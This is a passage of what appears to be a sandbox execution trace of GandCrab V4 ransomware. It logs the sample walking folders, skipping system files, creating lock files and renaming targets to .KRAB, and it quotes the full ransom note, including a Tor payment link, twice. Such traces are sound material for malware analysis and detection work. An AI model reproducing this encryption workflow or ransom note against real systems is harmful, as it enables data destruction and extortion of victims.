| out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.606] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.606] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.606] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.606] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.606] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\\\KRAB-DECRYPT.txt") returned 114 [0057.606] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0057.612] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.612] WriteFile (in: hFile=0x444, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.613] CloseHandle (hObject=0x444) returned 1 [0057.613] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.614] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.614] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x32b)) [0057.614] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.615] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.615] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.615] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a08d2ca4dee3d.lock") returned 120 [0057.615] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x450 [0057.619] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.619] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.619] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned 97 [0057.619] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0057.619] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0xfbdf20 [0057.619] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.619] FindNextFileW (in: hFindFile=0xfbdf20, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0057.619] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.619] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.619] FindNextFileW (in: hFindFile=0xfbdf20, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0057.619] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.619] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.620] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a08d2ca4dee3d.lock" [0057.620] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.620] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 125 [0057.620] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a08d2ca4dee3d.lock") returned 120 [0057.620] lstrlenW (lpString=".lock") returned 5 [0057.620] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.620] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.620] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.621] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.621] FindNextFileW (in: hFindFile=0xfbdf20, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0057.621] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.621] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.621] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\KRAB-DECRYPT.txt" [0057.621] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.621] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\KRAB-DECRYPT.txt.KRAB") returned 118 [0057.621] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\KRAB-DECRYPT.txt") returned 113 [0057.621] lstrlenW (lpString=".txt") returned 4 [0057.621] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.622] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.622] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.622] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\KRAB-DECRYPT.txt") returned 113 [0057.622] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\KRAB-DECRYPT.txt") returned 113 [0057.622] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.622] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.622] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.622] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.622] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.622] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.622] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.622] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.622] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.622] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.622] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.622] FindNextFileW (in: hFindFile=0xfbdf20, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0057.622] lstrcmpW (lpString1="sys", lpString2=".") returned 1 [0057.622] lstrcmpW (lpString1="sys", lpString2="..") returned 1 [0057.622] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="sys" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0057.623] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" [0057.623] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.623] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.623] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.623] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.623] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.623] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.623] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.623] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\\\KRAB-DECRYPT.txt") returned 118 [0057.623] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0057.625] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.625] WriteFile (in: hFile=0x458, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e0a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e0a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.626] CloseHandle (hObject=0x458) returned 1 [0057.626] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.626] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.627] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x33b)) [0057.627] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.627] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.627] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.627] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a08d2ca4dee3d.lock") returned 124 [0057.627] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x458 [0057.628] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, 